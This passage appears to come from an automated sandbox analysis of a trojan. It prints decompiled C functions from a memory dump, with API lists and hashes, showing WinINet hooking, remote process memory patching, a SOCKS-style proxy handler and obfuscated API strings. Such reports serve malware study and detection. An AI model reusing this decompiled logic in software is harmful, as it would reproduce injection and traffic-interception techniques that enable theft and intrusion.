        							_t27 =  *0x41477c; // 0x676e6972
        							if( *((intOrPtr*)(_t43 + _t27)) != 0) {
        								 *0x414778 =  *0x414778 + 1;
        								_v5 = 1;
        							}
        							_t29 = _t29 + 1;
        						} while (_t29 < _t36);
        					}
        					E004047F5(_t29);
        					 *0x414edc("pVirtualKeyExA");
        					E0040F17A(_t36, _v12);
        				}
        				return _v5;
        			}


















        APIs
        • RtlEnterCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404BDA
        • RtlLeaveCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404C40
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: pVirtualKeyExA$ryStringW
        • API String ID: 3168844106-3252542104
        • Opcode ID: 01114f00ebe0a06c3a85c11e3a47ed873ba30925897b0b572dfd6d5c0af8b4ec
        • Instruction ID: 6c6708373b0ac867fd58efb6f9f024190aea370be33c94d08b45ee2e35c6143b
        • Opcode Fuzzy Hash: 01114f00ebe0a06c3a85c11e3a47ed873ba30925897b0b572dfd6d5c0af8b4ec
        • Instruction Fuzzy Hash: D9112371500304AFE721ABA8C8496DE7BB5EBCA314F06407AE960733D1CB799C86C728
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 25%
        			E004097DF(intOrPtr __ebx) {
        				void* __esi;
        				signed int _t15;
        				intOrPtr _t18;
        				intOrPtr _t22;
        				intOrPtr _t23;
        				signed int _t24;
        				intOrPtr* _t25;
        				signed int _t26;
        				intOrPtr* _t27;
        
        				_t22 = __ebx;
        				if(__ebx == 0 || E0040979F(__ebx) != 0) {
        					L13:
        					return 0;
        				} else {
        					 *0x414ed8(0x414a14);
        					_t15 =  *0x414a0c; // 0x6f627965
        					_t23 =  *0x414a10; // 0x53647261
        					if(_t15 <= 0) {
        						L6:
        						_t26 = 0;
        						if(_t15 <= 0) {
        							L11:
        							if(E0040F0F6(4 + _t15 * 4, 0x414a10) != 0) {
        								_t24 =  *0x414a0c; // 0x6f627965
        								_t18 =  *0x414a10; // 0x53647261
        								 *0x414a0c =  *0x414a0c + 1;
        								_t25 = _t18 + _t24 * 4;
        								L16:
        								 *_t25 = _t22;
        								 *0x414edc(0x414a14);
        								return 1;
        							}
        							 *0x414edc(0x414a14);
        							goto L13;
        						}
        						while( *((intOrPtr*)(_t23 + _t26 * 4)) != 0) {
        							_t26 = _t26 + 1;
        							if(_t26 < _t15) {
        								continue;
        							}
        							goto L11;
        						}
        						_t25 = _t23 + _t26 * 4;
        						if(_t25 != 0) {
        							goto L16;
        						}
        						goto L11;
        					}
        					_t2 = _t15 * 4; // 0x5364725d
        					_t27 = _t23 + _t2 - 4;
        					while( *_t27 == 0) {
        						_t15 = _t15 - 1;
        						_t27 = _t27 - 4;
        						 *0x414a0c = _t15;
        						if(_t15 > 0) {
        							continue;
        						}
        						goto L6;
        					}
        					goto L6;
        				}
        			}













        APIs
          • Part of subcall function 0040979F: RtlEnterCriticalSection.NTDLL(tate), ref: 004097A9
          • Part of subcall function 0040979F: RtlLeaveCriticalSection.NTDLL(tate), ref: 004097D4
        • RtlEnterCriticalSection.NTDLL(tate), ref: 004097F6
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 00409851
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 00409873
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$Leave$Enter
        • String ID: eyboardState
        • API String ID: 2978645861-1210060208
        • Opcode ID: c1ba86e4b26f79498f9fca64e0e42451e1ac2618acdc34fef0ab4b50732e4421
        • Instruction ID: 2a55c66f3d65fc5c79ef22dd4f6eb8a3ad874ab2d4eea9cee1a78fb2f516a635
        • Opcode Fuzzy Hash: c1ba86e4b26f79498f9fca64e0e42451e1ac2618acdc34fef0ab4b50732e4421
        • Instruction Fuzzy Hash: CE11A0326602418ADB24BF65A844AA63365BFC3384B11C03ED802A3B93D7398C06CA1C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E0040E27A(void* __eflags, void* _a4, long _a8, void* _a12, DWORD* _a16, DWORD* _a20) {
        				void* __esi;
        				signed int _t10;
        				signed char* _t14;
        				void* _t16;
        
        				 *0x414ed8(0x414f68);
        				_t16 = _a4;
        				_t10 = E0040CC82(_t16);
        				if(_t10 != 0xffffffff) {
        					_t14 = _t10 * 0x30 +  *0x414f5c;
        					if(( *_t14 & 0x00000002) != 0) {
        						_t16 = _t14[0x10];
        					}
        				}
        				 *0x414edc(0x414f68);
        				return HttpQueryInfoW(_t16, _a8, _a12, _a16, _a20);
        			}








        APIs
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E285
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E2AA
        • HttpQueryInfoW.WININET(?,?,?,?,?), ref: 0040E2BD
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterHttpInfoLeaveQuery
        • String ID: essAsUserA
        • API String ID: 2599332303-2345198579
        • Opcode ID: 1a97d6165e0f29229ac535f3233df5f361eef297dfa11066912a4c712b7368c0
        • Instruction ID: e1cfe148458a0d374463c706ffc50a9df2aa78aa2618f79567a0d121f6ee821f
        • Opcode Fuzzy Hash: 1a97d6165e0f29229ac535f3233df5f361eef297dfa11066912a4c712b7368c0
        • Instruction Fuzzy Hash: BBF01233100104ABCB015FA6EC099DA7B69FFC5361B098166F915962B1C33599629B69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E0040E22B(void* __eflags, void* _a4, long _a8, void* _a12, DWORD* _a16, DWORD* _a20) {
        				void* __esi;
        				signed int _t10;
        				signed char* _t14;
        				void* _t16;
        
        				 *0x414ed8(0x414f68);
        				_t16 = _a4;
        				_t10 = E0040CC82(_t16);
        				if(_t10 != 0xffffffff) {
        					_t14 = _t10 * 0x30 +  *0x414f5c;
        					if(( *_t14 & 0x00000002) != 0) {
        						_t16 = _t14[0x10];
        					}
        				}
        				 *0x414edc(0x414f68);
        				return HttpQueryInfoA(_t16, _a8, _a12, _a16, _a20);
        			}








        APIs
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E236
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E25B
        • HttpQueryInfoA.WININET(?,?,?,?,?), ref: 0040E26E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterHttpInfoLeaveQuery
        • String ID: essAsUserA
        • API String ID: 2599332303-2345198579
        • Opcode ID: 86fff00f82a0ffbb8b21c32addcd37bad75e3b6023b0ca0874c9157a66663bc0
        • Instruction ID: bd02915647fc206e326d4eaad0ff4dcf230bea2d50ec102752914874facdcd48
        • Opcode Fuzzy Hash: 86fff00f82a0ffbb8b21c32addcd37bad75e3b6023b0ca0874c9157a66663bc0
        • Instruction Fuzzy Hash: 41F0A733000104ABCB015FA5DC099DB7F28FFC9321B098176F914972B1C3349832DB68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E0040E6A4(void* __eflags, void* _a4) {
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				int _t2;
        				int _t8;
        
        				_t2 = InternetCloseHandle(_a4);
        				_t8 = _t2;
        				 *0x414ed8(0x414f68);
        				if(E0040CC82(_a4) != 0xffffffff) {
        					E0040CD37(_t4, _t8, 0x414f68);
        				}
        				 *0x414edc(0x414f68);
        				return _t8;
        			}









        APIs
        • InternetCloseHandle.WININET(?), ref: 0040E6AC
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E6BA
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E6D0
          • Part of subcall function 0040CD37: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E692), ref: 0040CD4D
          • Part of subcall function 0040CD37: CloseHandle.KERNEL32(?), ref: 0040CD56
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDBA
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDC3
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDCC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$Internet$CriticalSection$EnterLeaveObjectSingleWait
        • String ID: essAsUserA
        • API String ID: 406405894-2345198579
        • Opcode ID: 4fbd01fb2de23321b2e1d399cb468b9ba5e2ad3d7f072ecbb801c77c43b1d9b2
        • Instruction ID: 6fd894409a7797765e1f1435790fae2223cc2f8b41334393aa0ac875738e4314
        • Opcode Fuzzy Hash: 4fbd01fb2de23321b2e1d399cb468b9ba5e2ad3d7f072ecbb801c77c43b1d9b2
        • Instruction Fuzzy Hash: BCD0C232211200AB860027BAAC8C8DF67ACEED9335305863BF124E22A0C7784822867D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00413832(WCHAR* _a4) {
        
        				lstrcpyW(_a4, "yNameW");
        				return lstrcatW(_a4, L".lll");
        			}




        APIs
        • lstrcpyW.KERNEL32(00413B91,yNameW), ref: 0041383B
        • lstrcatW.KERNEL32(?,.lll), ref: 0041384A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: lstrcatlstrcpy
        • String ID: .lll$yNameW
        • API String ID: 3905823039-2544435849
        • Opcode ID: e504c53ac1583ee800af99c6a5756783ab88ad92864f25176c8e4d7bbd0cff0e
        • Instruction ID: 30c8a07d45c3d761b3fe51e35429364440b2484357cbb89942221be5d872d93e
        • Opcode Fuzzy Hash: e504c53ac1583ee800af99c6a5756783ab88ad92864f25176c8e4d7bbd0cff0e
        • Instruction Fuzzy Hash: A7C04C71184201AFCA015B50EC09989BE71ABF0B43F11C436B245900B0C77544A1DA09
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412956(signed int __edx, long __edi, void** __esi, void* _a4) {
        				char _v5;
        				long _v12;
        				void _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _t22;
        				signed int _t25;
        				signed int _t41;
        				void** _t43;
        
        				_t43 = __esi;
        				_t41 = __edx;
        				_v5 = 0;
        				if(__edi <= 0xa00000) {
        					_t22 = E00410063( *__esi);
        					_v36 = _t22;
        					_v32 = _t41;
        					if((_t22 & _t41) != 0xffffffff && E00410043( *__esi, 0, 0, 2) != 0) {
        						_t25 = E00410063( *__esi);
        						_v28 = _t25;
        						_v24 = _t41;
        						if((_t25 & _t41) != 0xffffffff) {
        							E0040F21C( &_v20,  &_v20, 0, 5);
        							_v20 = __esi[4] ^ __edi;
        							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, __edi,  &_v12, 0) == 0 || _v12 != __edi) {
        								E00410043( *_t43, _v28, _v24, 0);
        								SetEndOfFile( *_t43);
        							} else {
        								_v5 = 1;
        							}
        						}
        						FlushFileBuffers( *_t43);
        						E00410043( *_t43, _v36, _v32, 0);
        					}
        				}
        				return _v5;
        			}















        APIs
          • Part of subcall function 00410063: SetFilePointerEx.KERNEL32(?,00000000,00000000,u)A,00000001,00412975,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00410078
          • Part of subcall function 00410043: SetFilePointerEx.KERNEL32(00000004,00000004,00000004,00000000,00000002,0041292C,?,00000000,00000000,00000000), ref: 00410055
        • WriteFile.KERNEL32(?,00000000,00000005,00000000,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000), ref: 004129CE
        • WriteFile.KERNEL32(?,00000005,00000000,00000005,00000000,?,?,?,00000008,00000000,00000000), ref: 004129E9
        • SetEndOfFile.KERNEL32(?,?,?,00000008,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00412A0E
        • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00412A16
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$PointerWrite$BuffersFlush
        • String ID:
        • API String ID: 1289656144-0
        • Opcode ID: 0410af7415e18902b7641383dffa6b16a4c38976019bf45448432ff81f913123
        • Instruction ID: 7d9063c9432b0f35d0ceee1fb0850a0c130c69ec221d5fbb5670dbb1b19890f8
        • Opcode Fuzzy Hash: 0410af7415e18902b7641383dffa6b16a4c38976019bf45448432ff81f913123
        • Instruction Fuzzy Hash: 7C215C75900108EEDB229FE5CC45EEEBFB9FF08344F14852AA190E1161D3BA49A09B68
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • WaitForSingleObject.KERNEL32(0100007F,00000000), ref: 004107D2
        • recv.WS2_32(?,?,00000400,00000000), ref: 00410816
        • send.WS2_32(?,?,00000000,00000000), ref: 0041082F
        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 0041086E
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ObjectSingleWaitrecvselectsend
        • String ID:
        • API String ID: 4176622587-0
        • Opcode ID: b2b99abd63bd245c33259fc579fcdac4b169c929715f5ac23924078959346934
        • Instruction ID: 5da3498e9c4697c8d5e461f6b9d3581162d7ed19e7fc07f408b93d1e65d4cb48
        • Opcode Fuzzy Hash: b2b99abd63bd245c33259fc579fcdac4b169c929715f5ac23924078959346934
        • Instruction Fuzzy Hash: 1E213A71A013289FDB20AF65DC84AEE7BA8FF45354F200056F959D2241D7B499C0CFE5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E00405D92(void* __ecx, void* __edx, void* _a4, WCHAR* _a8, WCHAR* _a12) {
        				char _v5;
        				long _v12;
        				long _v16;
        				short _v536;
        				long _t23;
        				int _t26;
        				signed int _t27;
        				void* _t36;
        				void* _t37;
        				void* _t39;
        
        				_t37 = __edx;
        				_t36 = __ecx;
        				_push( &_v16);
        				_push(_a4);
        				_v5 = 0;
        				if( *0x414d7c() != 0 && _v12 == 0) {
        					_t23 = _v16;
        					if(_t23 < 0xa000 && _t23 != 0) {
        						_t39 = E0040F14B(_t23);
        						if(_t39 != 0) {
        							_t26 = ReadFile(_a4, _t39, _v16,  &_v12, 0);
        							_t27 = _v12;
        							if(_t26 != 0 && _v16 == _t27) {
        								PathCombineW( &_v536, _a8, _a12);
        								_v5 = E0041341D(_t36, _t37, 3, 0,  &_v536, _t39, _v16);
        								_t27 = _v12;
        							}
        							SetFilePointer(_a4,  ~_t27, 0, 1);
        							E0040F15E(_t39);
        						}
        					}
        				}
        				return _v5;
        			}














        APIs
        • GetFileSizeEx.KERNEL32(?,?), ref: 00405DA8
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405DDD
        • PathCombineW.SHLWAPI(?,?,?), ref: 00405DFC
        • SetFilePointer.KERNEL32(?,?,00000000,00000001), ref: 00405E24
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$AllocateCombineHeapPathPointerReadSize
        • String ID:
        • API String ID: 3944749492-0
        • Opcode ID: cdab1856a7056c01ec423a48bb323aa3cefe5f692b76461e504a812bed7a14ac
        • Instruction ID: 5ea8a33f54c502a4fc313eb19a6338acf88e11f9fd1a129df9a0f8319ac9f1ba
        • Opcode Fuzzy Hash: cdab1856a7056c01ec423a48bb323aa3cefe5f692b76461e504a812bed7a14ac
        • Instruction Fuzzy Hash: E5113A72900109BFDF21AFE4DC88AEF7B7DEB15304F00807AF558A6150D2359B45CBA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407811(void* __edi, void* _a4) {
        				long _v8;
        				struct _MEMORY_BASIC_INFORMATION _v36;
        				int _t22;
        				void* _t24;
        
        				_t24 =  *0x414ad0; // 0xffffffff
        				_t22 = 0;
        				if(VirtualQueryEx(_t24, __edi,  &_v36, 0x1c) != 0 && _v36.Protect != 1 && (_v36.Protect & 0x00000100) == 0 && _v36.RegionSize != 0 && VirtualProtectEx(_t24, __edi, 4, 0x40,  &_v8) != 0) {
        					_t22 = WriteProcessMemory(_t24, __edi, _a4, 4, 0);
        					VirtualProtectEx(_t24, __edi, 4, _v8,  &_v8);
        				}
        				return 0 | _t22 != 0x00000000;
        			}







        0x00407819
        0x00407827
        0x00407831
        0x00407869
        0x00407876
        0x00407876
        0x00407886

        APIs
        • VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,004144E0,00000000), ref: 00407829
        • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 00407851
        • WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 00407863
        • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 00407876
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Virtual$Protect$MemoryProcessQueryWrite
        • String ID:
        • API String ID: 2789181485-0
        • Opcode ID: 849783bcbac01ca5da68d7cf0477a5dc528606e22a1a13f3ba11af2f66c2b57d
        • Instruction ID: 02b6077ffb0b45d70974ca2db4d7824bc1cdafff8271ca8a03a4685634a2ab63
        • Opcode Fuzzy Hash: 849783bcbac01ca5da68d7cf0477a5dc528606e22a1a13f3ba11af2f66c2b57d
        • Instruction Fuzzy Hash: AF015272940209BBEB119B929C49FEF767CFB49754F048035BB01A6180D7B8DA40CBB9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 71%
        			E00411395(char _a4) {
        				char _v9;
        				char _v13;
        				char _v20;
        				unsigned int _v25;
        				short _v27;
        				signed char _v28;
        				unsigned int _v40;
        				short _v42;
        				char _v44;
        				char _v304;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t57;
        				short _t72;
        				void* _t74;
        				void* _t77;
        				void* _t78;
        				void* _t88;
        				char _t90;
        				char _t97;
        				char _t106;
        				char _t122;
        				char _t125;
        				void* _t128;
        				intOrPtr _t129;
        				void* _t130;
        
        				_t106 = 0;
        				_push(0);
        				_push( &_v28);
        				_push(_a4);
        				_t57 = 7;
        				if(E00410611(_t57) != 0) {
        					while(E00410611(1, _a4,  &_v9, _t106) != 0) {
        						if(_v9 == _t106) {
        							_t109 = _v25;
        							_v13 = 0x5a;
        							if(((_v25 & 0x00ff0000 | _v25 >> 0x00000010) >> 0x00000008 | (_t109 & 0x0000ff00 | _t109 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
        								L21:
        								_v9 = 1;
        								if(_v13 != 0x5a) {
        									L46:
        									return E0041131F(_a4, 0xffffffff, _v13, _t106) & 0xffffff00 | _t68 != 0x00000000;
        								}
        								E0040F21C( &_v44,  &_v44, _t106, 0x10);
        								_t72 = 2;
        								_v44 = _t72;
        								_t74 = (_v28 & 0x000000ff) - 1;
        								if(_t74 == 0) {
        									_v42 = _v27;
        									_v40 = _v25;
        									_t77 = E00410692( &_v44, 0x10);
        									_t124 = _t77;
        									if(_t77 == 0xffffffff) {
        										L24:
        										_v13 = 0x5b;
        										goto L46;
        									}
        									_t78 = E0041131F(_a4, _t124, 0x5a, _t106);
        									if(_t78 != 1) {
        										if(_t78 != 0xffffffff) {
        											_v9 = _t106;
        										} else {
        											_v13 = 0x5b;
        										}
        									} else {
        										E0041070D(_t124, _a4);
        										_t106 = 0;
        									}
        									E00410970(_t124);
        									if(_v9 != 1 || _v13 == 0x5a) {
        										L36:
        										return _v9;
        									} else {
        										goto L46;
        									}
        								}
        								if(_t74 == 1) {
        									_t125 = E004106C8( &_v44, 0x10, 1);
        									_v20 = _t125;
        									if(_t125 == 0xffffffff) {
        										goto L24;
        									}
        									_t122 = E0041131F(_a4, _t125, 0x5a, _t106);
        									if(_t122 != 1) {
        										E00410970(_t125);
        										L33:
        										if(_t122 == 0xffffffff) {
        											goto L24;
        										}
        										if(_t122 != 1) {
        											_v9 = 0;
        										}
        										goto L36;
        									}
        									_t88 = E0041094B( &_v20,  &_a4);
        									_t108 = _t88;
        									E00410970(_v20);
        									if(_t88 != 0xffffffff) {
        										_t123 = _a4;
        										_t90 = E0041131F(_a4, _t108, 0x5a, 2);
        										_v20 = _t90;
        										if(_t90 == 1) {
        											E0041070D(_t108, _t123);
        										}
        										E00410970(_t108);
        										_t122 = _v20;
        										_t106 = 0;
        										goto L33;
        									}
        									_v13 = 0x5b;
        									_t106 = 0;
        									goto L46;
        								}
        								goto L24;
        							}
        							_t128 = 0;
        							while(E00410611(1, _a4,  &_v9, _t106) != 0) {
        								_t97 = _v9;
        								 *((char*)(_t130 + _t128 - 0x12c)) = _t97;
        								if(_t97 == 0) {
        									_push( &_v20);
        									_push(_t106);
        									_push(_t106);
        									_push( &_v304);
        									_v20 = _t106;
        									if( *0x414ce0() == 0) {
        										_t129 = _v20;
        										while(_t129 != _t106) {
        											if( *((intOrPtr*)(_t129 + 4)) == 2) {
        												E0040F19A( &_v25,  *((intOrPtr*)(_t129 + 0x18)) + 4, 4);
        												L20:
        												 *0x414ce4(_v20);
        												if(_t129 == _t106) {
        													goto L13;
        												}
        												goto L21;
        											}
        											_t129 =  *((intOrPtr*)(_t129 + 0x1c));
        										}
        										goto L20;
        									}
        									L13:
        									_v13 = 0x5b;
        									goto L21;
        								}
        								_t128 = _t128 + 1;
        								if(_t128 <= 0xff) {
        									continue;
        								}
        								goto L1;
        							}
        							goto L1;
        						}
        					}
        				}
        				L1:
        				return 0;
        			}































        APIs
        • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00411454
        • FreeAddrInfoW.WS2_32(?), ref: 0041148D
          • Part of subcall function 0041131F: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00411343
          • Part of subcall function 0041070D: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0041079E
          • Part of subcall function 00410970: shutdown.WS2_32(?,00000002), ref: 00410978
          • Part of subcall function 00410970: closesocket.WS2_32(?), ref: 0041097F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddrFreeInfoclosesocketgetaddrinfogetpeernameselectshutdown
        • String ID: Z
        • API String ID: 263972530-1505515367
        • Opcode ID: cd0bcc34bcf69663638493a94630cb5be7607553fd9e9f9a94d3c1edddfc715e
        • Instruction ID: 07eb7bd059e1cc88c34163b49e316a6eaea666dc4a98b61477b534f9a831ed89
        • Opcode Fuzzy Hash: cd0bcc34bcf69663638493a94630cb5be7607553fd9e9f9a94d3c1edddfc715e
        • Instruction Fuzzy Hash: 0F615C31900258BADF109BA48C41BFF7B6A9B41354F044667FB51B72E1D3BC89C5879D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E004080E4(short _a4, signed int _a8, char* _a16, int _a20) {
        				char _v5;
        				WCHAR* _v12;
        				intOrPtr _v40;
        				intOrPtr _v48;
        				char _v56;
        				short _v576;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t39;
        				signed char _t41;
        				char _t43;
        				void* _t45;
        				WCHAR _t48;
        				void* _t50;
        				short* _t51;
        				long _t53;
        				signed int _t65;
        				short _t71;
        				short _t72;
        				int _t74;
        				WCHAR* _t76;
        
        				_v5 = 0;
        				if(_a4 == 0x45 || _a4 == 0x46) {
        					E0040B0A0( &_v576);
        					_t65 = E0040F649( &_v576) + 1;
        					E00412C5E( &_v56);
        					_v40 =  *_a8;
        					_t39 =  *0x414a30; // 0x2210041
        					_v48 = _t39;
        					_v12 =  &_v576;
        					_t41 = E0040FD42(_t65,  &_v56, __eflags, 0);
        					asm("sbb al, al");
        					_t43 =  ~_t41 + 1;
        					__eflags = _t43;
        					_v5 = _t43;
        				} else {
        					_t65 = ExpandEnvironmentStringsW(E0040F5EA(_a8 | 0xffffffff,  *_a8),  &_v576, 0x104);
        					E0040F15E(_t60);
        					_t43 = _v5;
        				}
        				if(_t65 != 0 && _t43 == 0) {
        					_t74 = _a20;
        					_t45 = _t65 + _t74;
        					_t46 = _t45 + _t45 + 0x14;
        					if(_t45 + _t45 + 0x14 != 0) {
        						_t76 = E0040F14B(_t46);
        					} else {
        						_t76 = 0;
        					}
        					_t48 = 0x22;
        					 *_t76 = _t48;
        					_t22 = _t76 + 2; // 0x2
        					_t50 = E0040F19A(_t22,  &_v576, _t65 + _t65);
        					_t51 = _t50 + _t76;
        					_t71 = 0x22;
        					 *_t51 = _t71;
        					if(_t74 != 0) {
        						_t72 = 0x20;
        						 *((short*)(_t51 + 2)) = _t72;
        						_t25 = _t65 * 2; // 0x4
        						MultiByteToWideChar(0, 0, _a16, _t74, _t76 + _t25 + 4, _t74);
        					}
        					if(_a4 == 0x45 || _a4 == 0x47) {
        						_t53 = 1;
        						__eflags = 1;
        					} else {
        						_t53 = 0;
        					}
        					E0040B4C6(_t53, 0, _t76);
        					E0040F15E(_t76);
        					_t43 = _v5;
        				}
        				return 0 | _t43 == 0x00000000;
        			}

        APIs
        • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?), ref: 0040811E
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000004,?,00000002,?,00000022,00000000,?), ref: 004081E2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ByteCharEnvironmentExpandFreeHeapMultiStringsWide
        • String ID: G
        • API String ID: 4193686461-985283518
        • Opcode ID: 2ffd9b5a7fdc152816094f60092de8c8a1bc0c4fa8a4b47da8b774bad1c851c6
        • Instruction ID: 20455b3fcdfb5c6a1f557837f0cae914d81b8590bf2400cb6b3d12f3d9bfebe7
        • Opcode Fuzzy Hash: 2ffd9b5a7fdc152816094f60092de8c8a1bc0c4fa8a4b47da8b774bad1c851c6
        • Instruction Fuzzy Hash: 8631E631500208AACB21AFA4CD45BDA77B8DF05704F10807FF555BB2D2EB7C9A4AC798
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E00407A50(void* __eax, void* __ecx, void* __edx, void* _a4) {
        				signed int _v8;
        				signed int _v12;
        				void* __edi;
        				void* _t35;
        				void* _t36;
        				int _t38;
        				int _t42;
        				intOrPtr _t46;
        				intOrPtr _t47;
        				void* _t50;
        				void* _t53;
        				void* _t56;
        				signed int _t60;
        				void* _t62;
        				intOrPtr* _t64;
        
        				_t56 = __edx;
        				_t55 = __ecx;
        				_t35 = __eax;
        				_push(__ecx);
        				_push(__ecx);
        				_t53 = 0;
        				_v12 = 0;
        				_t64 = __eax;
        				while( *((intOrPtr*)(_t64 + 8)) != 0) {
        					_t36 = _t53;
        					while(1) {
        						_t35 = E00407889(_t36, _a4,  *_t64);
        						_t53 = _t35;
        						if(_t53 == 0) {
        							break;
        						}
        						_t3 = _t64 + 8; // 0x4142c0
        						_t60 = 0;
        						_v8 = 0;
        						if( *((intOrPtr*)( *_t3 + 8)) != 0) {
        							do {
        								_t38 = IsBadHugeReadPtr(_t53, 4);
        								if(_t38 != 0 ||  *_t53 == _t38) {
        									_t15 = _t64 + 8; // 0x4142c0
        									if( *((intOrPtr*)(_t60 +  *_t15 + 0xc)) != 0) {
        										_t18 = _t53 + 0x10; // 0x10
        										_t42 = IsBadHugeReadPtr(_t18, 4);
        										if(_t42 == 0 &&  *(_t53 + 0x10) != _t42) {
        											_t20 = _t64 + 8; // 0x4142c0
        											_t62 = _t60 +  *_t20;
        											_push( *((intOrPtr*)(_t62 + 8)));
        											_push(2);
        											_push( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0xc)))));
        											goto L14;
        										}
        									}
        								} else {
        									_t6 = _t64 + 8; // 0x4142c0
        									_t46 =  *_t6;
        									if( *((intOrPtr*)(_t60 + _t46 + 4)) == 0) {
        										L8:
        										_t12 = _t64 + 8; // 0x4142c0
        										_t47 =  *_t12;
        										if( *((short*)(_t60 + _t47)) != 0) {
        											_t14 =  &((_t47 + _t60)[4]); // 0x405bed
        											_push( *_t14);
        											_push(0);
        											_push( *(_t47 + _t60) & 0x0000ffff);
        											L14:
        											_push(_t53);
        											_push(_a4);
        											E00407949(_t55, _t56);
        										}
        									} else {
        										_t50 = _t46 + _t60;
        										_t9 = _t50 + 8; // 0x405bed
        										_t10 = _t50 + 4; // 0x401d10
        										if(E00407949(_t55, _t56, _a4, _t53,  *_t10, 1,  *_t9) == 0) {
        											goto L8;
        										}
        									}
        								}
        								_v8 = _v8 + 1;
        								_t27 = _t64 + 8; // 0x4142c0
        								_t60 = _v8 << 4;
        							} while ( *((intOrPtr*)(_t60 +  *_t27 + 8)) != 0);
        						}
        						_t30 = _t53 + 0x14; // 0x14
        						_t36 = _t30;
        					}
        					_v12 = _v12 + 1;
